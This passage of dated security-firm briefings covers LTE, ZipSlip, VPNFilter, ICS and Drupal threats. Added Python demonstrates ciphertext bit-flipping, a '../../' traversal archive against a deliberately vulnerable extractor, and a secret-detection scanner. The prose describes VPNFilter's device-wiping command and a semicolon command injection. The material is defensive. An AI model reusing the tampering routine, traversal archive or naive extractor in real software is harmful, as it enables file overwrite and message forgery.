Website fingerprinting – identify which sites users in a radio cell are visiting
Identity mapping – identify individual users in the radio cell
aLTEr – abusing flaws in the standard to redirect network communications via DNS spoofing

Impact
The impact of aLTEr and its related attack vectors is large, with hundreds of millions of devices using the vulnerable standard.  Researchers worked with the GSM Association (GSMA) and 3rd Generation Partnership Program (3GPP), along with telephone companies, to ensure that all parties responsible for addressing the problem were notified prior to the release of the paper.

The three main attacks outlined in the paper (mapping user identities in the radio cell, identifying websites a user visited, and the alteration attack via DNS manipulation) currently require special equipment and knowledge to perform, but it will not be long before these attacks show up in the wild.

The long-term impact will depend on whether the GSMA and the 3GPP fix the current standard in addition to ensuring that it is fixed in the next generation of the standard (5G).

The impact on individuals is hard to quantify at the moment, but the potential impact to critical infrastructure is serious.  Many of our critical infrastructure systems rely on LTE communications; for example, the smart grid relies heavily on LTE networks to transmit data.
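The reason end-to-end encryption and authentication above the LTE layer matter here is the property the aLTEr attack relies on: the LTE user plane is protected by a stream/counter-mode cipher that provides confidentiality without integrity, so flipping a ciphertext bit flips the same plaintext bit (a detail from the referenced paper, not stated in the briefing above). The Python below is an added illustration of that property and of the fix; it is not code from the researchers or from InGuardians. The keystream generator is a constructed SHA-256 stand-in for the real cipher, the message is a constructed sample, and the protection shown is a generic encrypt-then-MAC with an HMAC key the link layer never sees.

```python
import hashlib
import hmac
import os

# Constructed toy keystream generator standing in for the link-layer cipher.
# It is NOT the LTE algorithm and NOT secure; it is here only because it shares
# the property under discussion: ciphertext = plaintext XOR keystream.
def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    out = bytearray()
    block = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + block.to_bytes(4, "big")).digest()
        block += 1
    return bytes(out[:length])


def stream_encrypt(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Confidentiality only, no integrity. Decryption is the same operation."""
    return bytes(p ^ k for p, k in zip(data, _keystream(key, nonce, len(data))))


stream_decrypt = stream_encrypt  # XOR is its own inverse


def relay_modification(ciphertext: bytes, offset: int, old: bytes, new: bytes) -> bytes:
    """What an on-path relay can do to a keystream-encrypted message it cannot read:
    XORing (old ^ new) into the ciphertext turns the plaintext span at `offset`
    from `old` into `new`, as long as the relay knows or can guess `old`."""
    assert len(old) == len(new)
    out = bytearray(ciphertext)
    for i, (a, b) in enumerate(zip(old, new)):
        out[offset + i] ^= a ^ b
    return bytes(out)


def encrypt_then_mac(key: bytes, mac_key: bytes, nonce: bytes, data: bytes) -> tuple:
    """End-to-end protection independent of the link: the tag covers nonce + ciphertext."""
    ct = stream_encrypt(key, nonce, data)
    tag = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    return ct, tag


def verify_then_decrypt(key: bytes, mac_key: bytes, nonce: bytes, ct: bytes, tag: bytes) -> bytes:
    """Check the tag before touching the plaintext; reject anything that was modified."""
    expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):  # constant-time comparison
        raise ValueError("integrity check failed: message modified in transit")
    return stream_decrypt(key, nonce, ct)


def demo() -> tuple:
    """Returns (plaintext accepted when only encryption is used, whether the MAC caught it)."""
    key, mac_key, nonce = os.urandom(32), os.urandom(32), os.urandom(12)
    # Constructed sample message; both addresses are documentation-range IPs of equal length.
    message = b"resolver=198.51.100.10"
    old, new = b"198.51.100.10", b"203.0.113.250"
    offset = message.index(old)

    # 1. Link-layer style: encryption only. The modified message decrypts cleanly.
    ct = stream_encrypt(key, nonce, message)
    accepted = stream_decrypt(key, nonce, relay_modification(ct, offset, old, new))

    # 2. Encrypt-then-MAC above the link: the same modification is rejected.
    ct2, tag = encrypt_then_mac(key, mac_key, nonce, message)
    try:
        verify_then_decrypt(key, mac_key, nonce, relay_modification(ct2, offset, old, new), tag)
        caught = False
    except ValueError:
        caught = True
    return accepted, caught


if __name__ == "__main__":
    accepted, caught = demo()
    print("without integrity, the receiver sees:", accepted)
    print("with encrypt-then-MAC, tampering detected:", caught)
```

The point for vendors and operators is that the MAC key (or, in practice, a TLS or IPsec session) is negotiated end to end, so a relay sitting in the radio link has nothing it can forge even though it can still flip bits underneath.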

Recommendations
The main recommendation for the moment is to identify which parts of your business operations rely on LTE communications and to ensure that your vendors are using strong encryption and authentication independent of the LTE layer.

Additional Resources
Website for the attack research:
https://alter-attack.net

Academic paper on the research:
https://alter-attack.net/media/breaking_lte_on_layer_two.pdf

The Hacker News article:
https://thehackernews.com/2018/06/4g-lte-network-hacking.html?m=1

06/26/2018 Attackers leverage cost of GDPR fines to extort businesses
Issue
In what appears to be an exploit of the concept of “the lesser of two evils”, hackers in Europe have begun changing the approach of ransom-based attacks.  Two Bulgarian companies have recently had their data compromised, but instead of encrypting it and demanding that the victim pay up to get the data back, these attackers are threatening to make the data public.  This would expose the company to the risk of fines under Europe’s General Data Protection Regulation (GDPR), which went into effect in May.  These fines could be upward of 4% of annual revenue.

The attackers, acutely aware of the potentially high cost of GDPR fines, typically ask for much less.  At their highest, attackers are currently asking for the equivalent of €20,000.  This type of attack may be effective as GDPR is still relatively new, and businesses are still trying to grasp the risk of fines and levels of enforcement.

Impact
A wrinkle in this scheme is that the GDPR requires companies to report a breach within 72 hours of becoming aware of it, or also face steep fines.  As of today, if a company self-reports a breach, it is still liable for the 4% fine.  These attacks force the victimized companies to weigh the profit motive against full compliance with the law.

Recommendations
Due to the level of potential loss, and the possibility of running afoul of European law, companies subject to the GDPR should ensure that they do more than merely meet the minimum regulations of compliance dictated by GDPR. They also should apply defense-in-depth strategies and perform periodic penetration testing to ensure that their most sensitive data is protected in ways that are beyond reproach. Demonstrating that this due diligence has been performed is the only way to avoid a fine in the event of a reportable breach.

06/18/2018 ZipSlip: Vulnerabilities in compression archive file processing can lead to system compromise.

Issue

Researchers have demonstrated that multiple file archive extraction libraries, across multiple programming languages, allow an attacker-supplied archive to overwrite arbitrary paths on the filesystem.  In essence, a program using a vulnerable C#, Java, JavaScript, or Go library can unintentionally overwrite files on the machine with attacker-supplied content, granting the attacker remote code execution capability on the system. The file formats known to be affected include: ZIP, tar, jar, war, cpio, apk, rar and 7zip.

This is due to two major factors: vulnerable libraries and lack of centralized file archive extraction libraries. The vulnerable libraries span multiple languages. These include, but may not be limited to:

JavaScript NPM: Unzipper

JavaScript NPM: Admzip

Java: codehaus/plexus-archiver

Java: zeroturnaround/zt-zip

Java: zip4j

C# / .NET: DotNetZip.Semverd

C# / .NET: SharpCompress

C# / .NET: mholt/archiver

Java: java.util.zip

Java: commons-compress

C# / .NET: SharpZipLib

Ruby: zip-ruby

Ruby: rubyzip

Ruby: zipruby

Go: archive

The lack of centralized libraries for performing archive file extraction has led to the development of hand-crafted methods.  These hand-crafted methods often lack robust error-trapping routines to prevent extracted files from being written outside of the extraction path.  These hand-crafted code “snippets” are often shared publicly (through websites such as StackOverflow) and adopted across many projects.  With these three factors considered, many closed- and open-source projects are writing or have adopted vulnerable archive file extraction processing.  This issue can result in the overwriting of sensitive system files by a malicious file archive, potentially resulting in remote code execution and full system compromise.

The researchers discovering this issue have identified a number of common applications that carry the vulnerability, including the Apache projects: Ant, Hadoop, Hive, Maven, and Storm.  A comprehensive list of these applications can be found at:

    https://github.com/snyk/zip-slip-vulnerability
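To make the failure concrete, here is an added Python example (not code from the researchers, from InGuardians, or from any of the libraries listed) of a hand-rolled extractor of the kind described above, next to a hardened version. The archive is constructed in memory and contains one benign entry and one “../../” entry; the naive extractor writes the second outside its target directory, while the safe extractor resolves every entry path and rejects the whole archive before writing anything if any entry escapes. Python’s zipfile module is used only to build and read the sample; the demonstration is about the hand-written pattern, not a flaw in that module.

```python
import io
import os
import tempfile
import zipfile


def build_sample_archive() -> bytes:
    """Constructed in-memory archive: one benign entry and one traversal entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/readme.txt", "benign content\n")
        zf.writestr("../../outside.txt", "this lands outside the extraction directory\n")
    return buf.getvalue()


def extract_naive(archive: bytes, dest: str) -> list:
    """Hand-rolled extractor of the kind the briefing describes: trusts the entry
    name, joins it onto dest and writes. Vulnerable to ZipSlip."""
    written = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            target = os.path.join(dest, info.filename)
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(os.path.normpath(target))
    return written


def safe_target(dest: str, name: str) -> str:
    """Resolve the entry path ('..', absolute names and symlinks under dest all
    collapse here) and require it to remain inside the destination directory."""
    root = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, target]) != root:
        raise ValueError(f"archive entry {name!r} escapes {root}")
    return target


def extract_safe(archive: bytes, dest: str) -> list:
    """Validate every entry before writing anything, so a hostile archive
    produces no partial output at all."""
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        planned = [(info, safe_target(dest, info.filename)) for info in zf.infolist()]
        written = []
        for info, target in planned:
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(target)
    return written


def demo() -> dict:
    """Run both extractors against the sample archive inside a scratch directory."""
    base = tempfile.mkdtemp(prefix="zipslip-demo-")
    archive = build_sample_archive()
    naive_dest = os.path.join(base, "naive", "extract")
    safe_dest = os.path.join(base, "safe", "extract")
    os.makedirs(naive_dest)
    os.makedirs(safe_dest)

    extract_naive(archive, naive_dest)
    # '../../outside.txt' relative to base/naive/extract resolves to base/outside.txt
    naive_escaped = os.path.exists(os.path.join(base, "outside.txt"))

    try:
        extract_safe(archive, safe_dest)
        safe_rejected = False
    except ValueError:
        safe_rejected = True
    safe_dest_untouched = os.listdir(safe_dest) == []
    return {"naive_escaped": naive_escaped, "safe_rejected": safe_rejected,
            "safe_dest_untouched": safe_dest_untouched, "scratch_dir": base}


if __name__ == "__main__":
    print(demo())
```

The same realpath-plus-commonpath check is the test to look for when reviewing the shared snippets the briefing mentions: an extractor that only strips a leading “../” or only rejects absolute names is still bypassable, whereas resolving the final path and comparing it against the resolved destination is not.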

Impact

The impact of this vulnerability will differ from environment to environment, depending on the various software packages deployed.  However, should an organization be utilizing one of the affected and identified applications, it is possible for a malicious actor to deliver a specifically-crafted archive file to a victim program, which can cause a full system compromise simply by extracting the file.  Because of the code-sharing nature of these snippets and the deficiencies in the affected programming languages’ libraries, it is highly likely that this issue far exceeds the currently identified scope.

Recommendations

Our recommendations fall into two separate categories:

Developers and Enterprise Development operations:

Evaluate the quality of shared code, and fully test it for “outside cases” before implementation.

Integrate the use of shared code evaluation into the DevOps process.

Select and adopt a standard set of libraries for core application functions, and document and standardize on its implementation based on testing results.

Carefully select development languages at the start of any new project, taking into account the use of well developed core libraries essential to the success of the project.

Enterprise adopters:

Perform robust and regular testing of all application input functions at time of adoption and during major code updates or releases.

When possible, perform regular code audits of open source projects in use in the organization in order to discover similar failures.

When possible, encourage your software vendors to perform regular code audits in order to discover similar failures.  Ask them to share the results (under NDA or otherwise) so that proper risk decisions and corrective actions can be made.

Ultimately all organizations should be mindful of the ZipSlip vulnerability, patch currently identified vulnerable applications, and watch for additional discoveries. Remember, this specific exploit of a vulnerability has revealed previously unknown or only narrowly known general vulnerabilities that may enable many more exploits. 

Additional Resources

ZipSlip Overview:

https://securityboulevard.com/2018/06/zip-slip-vulnerability-affecting-thousands-of-apps-puts-systems-at-risk/

ZipSlip Release and White Paper:

https://snyk.io/research/zip-slip-vulnerability

Current list of known vulnerable software and patch status:

https://github.com/snyk/zip-slip-vulnerability

 

05/29/2018 New “VPNFilter” malware targets at least 500K networking devices worldwide.

Issue

Dubbed “VPNFilter” by Cisco’s Talos research group, this multi-stage, modular platform has versatile capabilities to support both intelligence-collection and destructive cyber attack operations. The first stage will persist through a device reboot, enabling downloads of other stages and full reinfection. It also redundantly maintains the IP address(es) of second stage deployments, enabling robust maintenance of the malware command and control (C2) environment even in the face of unpredictable changes, such as those occurring as system administrators attempt to track and remove malware. 

Impact

The code collects intelligence (scans) and has multiple attack features that can either execute additional commands or simply “brick” a device. From the Talos blog, “… the code of this malware overlaps with versions of the BlackEnergy malware — which was responsible for multiple large-scale attacks that targeted devices in Ukraine.” That overlap with known attack code and two separate upticks in malware on Ukrainian IP addresses in mid-May 2018 prompted Talos to release information before completing full analysis. 

VPNFilter includes modules to use the Tor anonymity network to mask C2 IP addresses and foster misattribution. It is designed to attack devices on the perimeter of the network, with no intrusion protection system (IPS) in place, and that typically do not have an available host-based protection system such as an anti-virus (AV) package.

Specific sequences in the malware include:

  • kill: Overwrites the first 5,000 bytes of /dev/mtdblock0 with zeros, and reboots the device (effectively bricking it).
  • exec: Executes a shell command or plugin.
  • tor: Sets the Tor configuration flag (0 or 1).
  • copy: Copies a file from the client to the bad actor’s remote server.

The inherent destructive capability is of particular concern because it allows the operators of this malware to ‘brick’ the network connections of any infected organizations. That would eliminate remote operations control for ICS/SCADA systems, as well as shut down any other network connections. The combination of intelligence gathering and mapping seems aimed at finding systems from which to launch effective attacks.

Recommendations

  • Reset SOHO routers and directly-connected NAS devices to factory settings, then update with up-to-date, non-vulnerable firmware.
  • Work with ISPs to reset devices provided by ISPs.
  • For any directly connected device that may be infected or suspect, contact and work closely with manufacturers to ensure devices have up-to-date firmware and that they are not infected.
  • ISPs should also work aggressively with customers to address potential problems.

This is a harbinger of IoT risks that will likely become more common.  Look at the ‘heat’ map in the SDX Central article below to see that this is, at least so far, clearly targeting or being tested against Ukraine, and that it appears to be a direct descendant of the previously-discovered Russian malware BlackEnergy.  It has, however, also been discovered in 54 other countries so far.  It is not going away.

Additional Resources

Cisco Talos Group blog warns of “VPNFilter” malware

https://blog.talosintelligence.com/2018/05/VPNFilter.html

SDX Central – Cisco Warns Massive Russian Malware Attack Hit 500K Routers Globally

https://www.sdxcentral.com/articles/news/cisco-warns-massive-russian-malware-attack-hit-500k-routers-globally/2018/05/amp/ 

IBM X-Force report on Russian malware BlackEnergy

https://exchange.xforce.ibmcloud.com/collection/BlackEnergy-Malware-e0bb9284e8eb3366b63f40eadf9e56c7 

 

05/21/2018 New PDF malware combines recent Windows & Adobe exploits

Issue

New PDF malware combines two zero-day exploits discovered as recently as last week.  The malware, detected by anti-malware firm ESET, combines the most recent Windows and Adobe exploits to compromise Microsoft Windows operating systems.  The patches for the flaws being exploited have been available for only a short period of time; Microsoft released its patches on May 8th, with Adobe releasing security patches for Reader and Acrobat on May 14th.  The PDF malware in question compromises Windows systems when users open an infected PDF on a vulnerable system.  Both flaws offer remote command execution to the attacker, with the Windows flaw offering SYSTEM-level access.  The major impact of this is that these are two new zero-day exploits found in a malicious PDF file, in the wild.

Impact

The impact of combining two zero days into a lethal piece of malware could be devastating.  How many were hit before the patches?  The end result is not known at this time.  The sample identified by ESET did not contain a final payload, so the initial goal of the malware is not known.  That said, the malware is sophisticated and the zero day exploits embedded in it are more so. 

Recommendations

With zero-day exploits in the wild it is usually too late to simply patch your systems.  We are by no means advocating delaying patching of your systems, but at this time it is advisable to engage a full internal hunt team to identify vulnerable and/or compromised systems.  This is a good reminder that we need to implement the basics first: patch/vulnerability management, software/data inventory, governance, etc.  Once those are shored up, start to look at additional segmentation, access management, application firewalls and whitelisting.  Zero-day exploits are in the wild, and our organizations have to evolve to be resilient against exploits we do not have patches for.

Additional Resources

Microsoft Patch for CVE-2018-8120

https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8120

Adobe Security Bulletin:

https://helpx.adobe.com/security/products/acrobat/apsb18-09.html

Anton Cherepanov Blog on the two zero days found in PDF malware

https://www.welivesecurity.com/2018/05/15/tale-two-zero-days/

 

05/14/2018 Industrial Control System product vendor Schneider Electric’s InduSoft and InTouch products contain critical security vulnerabilities.

Issue

Schneider Electric makes products that allow HMI clients to read and write tags and to monitor alarms and events.  Their InduSoft and InTouch software is vulnerable to remote compromise and should be patched immediately.

Impact

Schneider Electric’s software is often deployed on critical Industrial Control Systems, and its InduSoft and InTouch applications are vulnerable to remote compromise.  The vulnerable software runs with a high privilege level, so compromised systems should be completely wiped and reinstalled before being put back into production.  Given the severity of the vulnerability and the criticality of the systems, we would rate the impact as high.

Recommendations

InGuardians recommends the following steps be taken:

  1. Identify if you run either of the two applications – software inventory
  2. If running the software, ensure that it is running on isolated network segments
  3. Check production systems for indicators of compromise
  4. Patch vulnerable systems &/or rebuild compromised systems

Additional Resources

Schneider Electric Security Bulletin LFSEC00000125

http://software.schneider-electric.com/pdf/security-bulletin/lfsec00000125/

Schneider Electric InduSoft Web Studio and InTouch Machine Edition Remote Code Execution (Tenable Research Advisory Detail)

https://www.tenable.com/security/research/tra-2018-07

 

Tenable Research Advisory: Critical Schneider Electric InduSoft Web Studio and InTouch Machine Edition Vulnerability

https://www.tenable.com/blog/tenable-research-advisory-critical-schneider-electric-indusoft-web-studio-and-intouch-machine

05/07/2018 Plaintext Passwords Exposed on Twitter and Github, Suggesting Password Safes and MFA

Issue

Last week, both Twitter and GitHub publicly announced that their services had exposed plaintext passwords in internal log streams.  While neither company has disclosed a compromise, mature information security programs assume that at least one machine in the organization is under the control of a bad actor, and thus that any cleartext password must be replaced.  While Twitter has begun requiring some users to change passwords and GitHub has made no such requirement, it would behoove all users of both Twitter and GitHub to assume their passwords are compromised.

Impact

If one or more bad actors have compromised either Twitter or GitHub, they may possess your organization’s credentials for the respective service. If your organization uses multi-factor authentication (MFA/2FA) for any accounts, the bad actors will likely not have gained access using those accounts.  

A GitHub account compromise produces significant risk in multiple ways. First, if a bad actor can alter code stored on GitHub that a user deploys to your or their own systems, they can achieve an indirect compromise of those systems and any systems accessible by them. Second, a bad actor may find access credentials, private certificate keys, or other secrets stored in GitHub. InGuardians often finds this kind of data in its red team penetration tests, particularly API keys that provide full cloud service administration capabilities. Finally, when targeting a DevOps environment, a bad actor with GitHub access gains full knowledge of routing, firewall and system provisioning code.

Recommendations

InGuardians recommends changing the passwords of all organization accounts on both Twitter and GitHub.  Given the tendency for code and data to proliferate to both personal and business GitHub accounts, InGuardians recommends requiring all staff to change their personal and business GitHub passwords and to implement multi-factor authentication on that platform.

InGuardians also recommends deploying password safe software or hardware, whether free or commercial, to ensure that every password an organization uses is unique.  Bad actors will gain access to passwords; to understand, contain and recover from the damage, it’s important to make sure that compromised passwords are useful on only one service.

Further, InGuardians recommends conducting a quarterly internal review of what code, data and secrets lie in GitHub repositories, to both understand and reduce the amount of sensitive or secret information that is entrusted there.
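One way to carry out the quarterly repository review recommended above is a small scanner for the secret formats that most often end up in code. The Python below is an added example, not an InGuardians tool: the AWS access key ID shape and the PEM private-key header are well-known formats, the assignment rule is a heuristic of our own, and the sample files are constructed (the AWS value is Amazon’s documented example key, not a live credential). scan_files works on an in-memory set of files so the demonstration runs offline; scan_tree applies the same rules to a checked-out repository on disk.

```python
import os
import re

# Detection rules. The AWS access key ID shape and the PEM header are well-known
# formats; the assignment rule is a heuristic assumption (a quoted literal of 8+
# non-space characters assigned to a secret-looking name).
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"),
    "secret_assignment": re.compile(
        r"(?i)\b(?:password|passwd|secret|api[_-]?key|token)\b['\"]?\s*[:=]\s*['\"][^'\"\s]{8,}['\"]"
    ),
}

SKIP_DIRS = {".git", "node_modules", "vendor"}


def scan_text(path: str, text: str) -> list:
    """Return one finding per (line, rule) hit. The matched value is deliberately
    not copied into the finding, so the report does not spread the secret further."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in SECRET_PATTERNS.items():
            if pattern.search(line):
                findings.append({"path": path, "line": lineno, "rule": rule})
    return findings


def scan_files(files: dict) -> list:
    """Scan an in-memory {path: content} mapping (used for the offline demo)."""
    findings = []
    for path, text in files.items():
        findings.extend(scan_text(path, text))
    return findings


def scan_tree(root: str) -> list:
    """Scan a checked-out repository on disk with the same rules."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                    findings.extend(scan_text(os.path.relpath(path, root), fh.read()))
            except OSError:
                continue
    return findings


# Constructed sample repository contents. The AWS value is Amazon's documented
# example key; the private-key body and the password are placeholders.
SAMPLE_FILES = {
    "config/settings.py": 'DEBUG = False\nAWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"\n',
    "deploy/id_rsa": "-----BEGIN RSA PRIVATE KEY-----\nMIIEconstructedplaceholder\n-----END RSA PRIVATE KEY-----\n",
    "tests/fixtures.py": 'DB = {"user": "svc", "password": "c0nstructed-sample-pw"}\n',
    "src/app.js": "const password = process.env.DB_PASSWORD;\n",  # read from the environment: fine
    "README.md": "# Service\nSet API_KEY in your environment before running.\n",
}


if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f['path']}:{f['line']}: {f['rule']}")
```

A scanner like this is only the starting point of the review: the findings still have to be triaged, the credentials rotated (a secret that was ever committed should be treated as exposed even after the file is deleted, since it remains in history), and the same rules wired into a pre-commit or CI check so the next quarter has less to find.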

Additional Resources

Twitter Admits Recording Plaintext Passwords in Internal Logs, Just Like GitHub

https://www.bleepingcomputer.com/news/security/twitter-admits-recording-plaintext-passwords-in-internal-logs-just-like-github/

GitHub Accidentally Recorded Some Plaintext Passwords in Its Internal Logs

https://www.bleepingcomputer.com/news/security/github-accidentally-recorded-some-plaintext-passwords-in-its-internal-logs/

 

04/30/2018 Multiple known Java and HPE iLO vulnerabilities being targeted for ransomware

Issue

Software management is often boring.  It is, however, essential to business survival.  The many “new” attacks that grab media attention all too often exploit known vulnerabilities for which patches have been published – and missed or ignored.  Atlanta’s recent ransomware attack exploited Java’s deserialization bug, which was called the most under-hyped vulnerability of 2015.

It is NOT just Java.  HPE iLO, an integrated remote management console for HP servers, has many known vulnerabilities.  They are now being hit with disconnect and lock-out ransom demands.  This one may not be encrypting drives, but instead is remotely locking out administrators.  The effect and impetus for ransom are the same.

Impact

Atlanta’s one case has so far incurred $2.6 million in external consulting costs; there is no capture of internal costs or disruption effects, and as of this writing Atlanta’s departments are still using paper and other offline tools.  In many commercial environments, this is a business killer.  The iLO attacks effectively take servers offline – they are no longer under your control.

Any unpatched or unresolved vulnerability is opportunity for exploitation and disaster. Delays in patching increase the window of vulnerability and the likelihood of exploitation. A ‘standardized’ weekly or monthly or worse patch cycle, if known publicly, advertises an organization’s unpreparedness. E.g., Outfit A, Inc., patches on first Mondays of the month; a vulnerability and patch are published in the second week; attackers can posit Outfit A will remain vulnerable AT LEAST 3 weeks … and maybe even into more than one cycle.

Recommendations

1. Do frequent and aperiodic vulnerability assessments. Scan for vulnerabilities and create a realistic, prioritized, ACTION list.

2. Pay attention to other organizations, news, and vulnerability announcements.

3. PATCH. Just Do It. When patches are more complex, mitigate with layered defenses and architecture – network segmentation.

4. Review policy and architecture to ensure systems that should NOT face the internet, such as HPE iLO interfaces, DON’T.

5. And do not let anyone tell you to relax, it’s only a “theoretical vulnerability.” Ever.

In 2015 the Java vulnerabilities “were considered to be theoretical and hard to exploit.”(1)

STOP. That mistaken viewpoint goes back decades – was wrong then and is wrong now. 

Additional Resources

Atlanta fall-out continues

2018 – Atlanta projected to spend at least $2.6 million on ransomware recovery

https://www.zdnet.com/article/atlanta-spent-at-least-two-million-on-ransomware-attack-recovery/

This is NOT new – it’s been skipped and left to fester:

2015 – Java Serialization Vulnerability Threatens Millions of Applications

https://www.contrastsecurity.com/security-influencers/java-serialization-vulnerability-threatens-millions-of-applications

… and it persists

2018 – Cisco Secure Access Control System Java Deserialization Vulnerability

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180307-acs2

(1) 2016 – Lessons Learned from the Java Deserialization Bug

https://www.paypal-engineering.com/2016/01/21/lessons-learned-from-the-java-deserialization-bug/

And it is NOT just Java

2018 – Ransomware Hits HPE iLO Remote Management Interfaces

https://www.bleepingcomputer.com/news/security/ransomware-hits-hpe-ilo-remote-management-interfaces/

The CVE list of HPE iLO vulnerabilities:

https://www.cvedetails.com/vulnerability-list/vendor_id-10/product_id-23648/HP-Integrated-Lights-out-4-Firmware.html

04/23/2018 Attackers Compromising Drupal-based Web Sites En Masse for Financial Gain

Issue
Attackers are using two vulnerabilities, including Drupalgeddon2, to compromise Drupal installations, install DDoS and currency-mining malware, and attack non-Drupal machines made accessible by that foothold.

Impact
The impact for organizations which run Drupal now (or ran it at any time since March 28th, 2018) is severe. Multiple organized criminal groups have raced to exploit the first vulnerability, named Drupalgeddon2. The most prolific uses malware named “Muhstik,” which infects a host, then spreads to other machines using SSH and WebDav, as well as exploits against the Drupalgeddon2 vulnerability and vulnerabilities in Oracle’s WebLogic, ClipBucket, Webuzo, and the WordPress content management system. Muhstik is a variant of Tsunami, which has infected tens of thousands of Linux hosts. Muhstik has built a botnet from servers and Internet of Things (IoT) “smart devices,” allowing it to scan the Internet for vulnerable hosts very quickly.

Recommendations
For any site that ran Drupal since March 28th, it’s critical to patch the Drupal software immediately. InGuardians further recommends assuming that Internet-facing Drupal installations have been compromised, until that assertion can be ruled out. The Muhstik malware doesn’t spread only using software vulnerabilities. It also scans for SSH servers, trying both a pre-populated set of password possibilities as well as credentials that it finds on the system from which it runs. If Muhstik compromised a single Drupal system, it has likely spread to other systems.

InGuardians has seen many clients use a best practice approach to content management system-provided websites. These clients bifurcate their Drupal application servers into two servers: an internal dynamic server and an external static server. The internal server runs the content management system (Drupal) to allow organization staff to update the site’s content. On any update, this server pushes a static mirror of the site to the external server.  The external server serves content statically, exposing far less code to attackers. This can be accomplished on Drupal using the Static Generator module.

Additionally, InGuardians recommends disallowing root login via SSH and relocating the SSH server port from 22 to a less well-known number. These two measures massively reduce the number of successful SSH-based attacks, whether in initial infection or lateral movement.

Additional Resources
Drupal Patch Instructions for Drupalgeddon2
https://www.drupal.org/sa-core-2018-002

Drupal Static Generator Module
https://www.drupal.org/project/static

Botnet Muhstik is Actively Exploiting Drupal CVE-2018-7600 in a Worm Style (Netlab at 360.com)
https://blog.netlab.360.com/botnet-muhstik-is-actively-exploiting-drupal-cve-2018-7600-in-a-worm-style-en/

Big IoT Botnet Starts Large-Scale Exploitation of Drupalgeddon 2 Vulnerability (Bleeping Computer)
https://www.bleepingcomputer.com/news/security/big-iot-botnet-starts-large-scale-exploitation-of-drupalgeddon-2-vulnerability/

04/16/2018 Researchers Can Hijack ATI Systems’ Emergency Alert Sirens Using Software Defined Radio (SDR)

Issue
Security researchers at Bastille Networks were able to capture, analyze and replay packets to trigger emergency alert sirens in the city of San Francisco provided by ATI Systems.  Over a 2 year period, researchers captured the weekly transmission to initiate system tests.  Upon analyzing the captured radio protocol, it was discovered that the transmissions were neither encrypted nor authenticated.

While the ATI Systems emergency alert sirens are a unique implementation, the vulnerability in these systems extends to those installed outside of San Francisco, with identical systems deployed across the globe.  Attacks against these types of systems are not unique, as it is theorized that similar attacks were used in the erroneous activation of the Tornado Warning sirens in Dallas, Texas.

Adoption of proprietary Radio Frequency (RF) systems is quite common in both legacy and current systems.
InGuardians often finds that organizations do not have an accurate inventory of RF-enabled systems in their environment, nor do they understand the overall implications of compromise of the unknown RF-enabled systems.

Impact
This proof of concept is specific to the ATI Systems implementations, which by design, could cause widespread panic should the emergency sirens be triggered by an attacker.  However, a bad actor or researcher could use the overall methodology and tools for discovering an attack surface for this system on other RF-enabled systems.  Overall impact to an organization will depend on the affected system discovered and analyzed, but it is not outside the realm of possibility that there could be pecuniary or life safety issues.

With the increased development in Software Defined Radio (SDR) and expertise in these tools being gained by the security community, RF protocols that formerly enjoyed “security through obscurity” are unlikely to remain free from attack much longer.  This becomes particularly challenging in legacy systems where the RF protocols were designed with obscurity as the only security measure either due to lack of available technology, or little future consideration in technology advancements.

Recommendations
InGuardians recommends its clients perform or commission an overall discovery of RF-enabled systems in the enterprise environment, followed by a thorough risk analysis. Should the risk impact be determined to be elevated for any of the discovered systems, it is recommended, at a minimum, to contact the vendor in order to determine the methods in use for securing, encrypting, and authenticating transmissions.  Should the answers from the vendor be insufficient, or the RF-enabled systems be critical to the operation of the business, a thorough review and analysis of the RF transmissions should be performed.

Additional Resources
Sirenjack
https://www.sirenjack.com

Dallas Tornado Siren Hack [Washington Post]
https://www.washingtonpost.com/news/the-intersect/wp/2017/04/09/someone-hacked-every-tornado-siren-in-dallas-it-was-loud/

04/09/2018 Security vulnerabilities in two Moxa Industrial Control Systems (ICS) devices

Issue
There are security vulnerabilities in two Moxa ICS devices: MXview network management software and the AWK-3131A 802.11n ICS wireless gear.  The management software has a flaw that would allow an attacker to view/retrieve the cryptographic key on the server.  The wireless gear has a flaw that allows an unauthenticated user to execute commands on the system.

Impact
The first vulnerability affects Moxa’s AWK-3131A 802.11n ICS wireless network gear.  This was reported initially by Cisco Talos in December 2017, and patched by Moxa on April 3.  The vulnerability is present due to the way Moxa is using ‘loginutils’ to parse failed logins, allowing attackers to use a semicolon to terminate the login and follow it with a command to be executed.  Cisco Talos has stated that it believes the web front end is also vulnerable to the attacks, as it also uses ‘loginutils’ to parse the failed logins.  The vulnerability was successfully exploited via ‘Telnet’, ‘SSH’, and the local management console.

The second vulnerability is in Moxa’s MXview network management software, and allows an attacker to retrieve the private key for the server.  Obtaining the cryptographic private key would allow the attacker to decrypt files and traffic.  The flaw is considered severe enough for DHS to have issued an advisory on April 5.  This follows a flaw in the same product discovered in January, which allows attackers to use an “unquoted search path” in order to execute code or gain access to files on the server.

